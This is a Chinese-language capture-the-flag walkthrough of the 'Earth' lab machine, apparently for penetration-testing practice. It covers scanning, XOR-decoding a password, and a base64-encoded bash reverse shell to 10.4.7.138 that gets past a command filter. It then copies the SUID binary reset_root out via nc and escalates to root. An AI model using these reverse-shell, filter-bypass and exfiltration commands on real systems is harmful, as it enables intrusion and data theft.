earth
扫描
nmap -sV -A -p- 10.4.7.140
此处扫描结果有DNS
80无法正常访问,因此需要修改hosts配置文件
sudo vim /etc/hosts
使用dirb扫描这两个不同的域名,以及443https服务下的域名
dirb http://earth.local
dirb http://terratest.earth.local
dirb https://terratest.earth.local
dirb https://earth.local
四个结果几乎都是这样
只有https的terratest结果不一样
此处扫描的有一个robots文本文件
访问结果如图
此处尝试最后一个访问,发现没有后缀无法访问,只能尝试,因为时notes命名,猜测为.txt
https://terratest.earth.local//testingnotes.txt
因此使用该url访问
内容如图
渗透
此处获取一些信息,先查看下提及的testdata.txt文件,因为它说该文件用来测试加密
此处感觉像是介绍,好像没有包含有效信息
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
此处为首页展示的三串密文
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a
解码,密钥为刚才的文本文件
发现该内容都是这一句的重复
earthclimatechangebad4humans
此处只有第三个解出来不是乱码,显然是有用的信息
此前也给了一个用户名,尝试一下登录
登录过后有个命令执行框,尝试执行命令,发现ip部分应该有过滤,也可能部分命令过滤
直接执行反弹shell不行,此处使用一些手段处理shell指令
bash -i >& /dev/tcp/10.4.7.138/12138 0>&1
base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC40LjcuMTM4LzEyMTM4IDA+JjE=
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC40LjcuMTM4LzEyMTM4IDA+JjE= | base64 -d | bash
使用管道符作为拼接,最后执行成功
此处寻找一下有执行权限的文件
find / -perm -4000 2>/dev/null
有一个名称为reset_root的文件,重置root
查看它内容
除了上面一行,其它都乱码了
好像该文件是要把密码改为Earth
提权
┌──(root㉿kali)-[~]
└─# nc -lnvp 9999 > reset_root
bash-5.1$ nc 10.4.7.138 9999 < /usr/bin/reset_root
chmod +777 reset_root
ltrace ./reset_root
使用ltrace看看该文件不能正常执行的原因
发现缺少这三个目录文件
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
在靶机中创建这三个文件夹,随后执行reset_root
显示密码更换完成 Earth
切换用户到root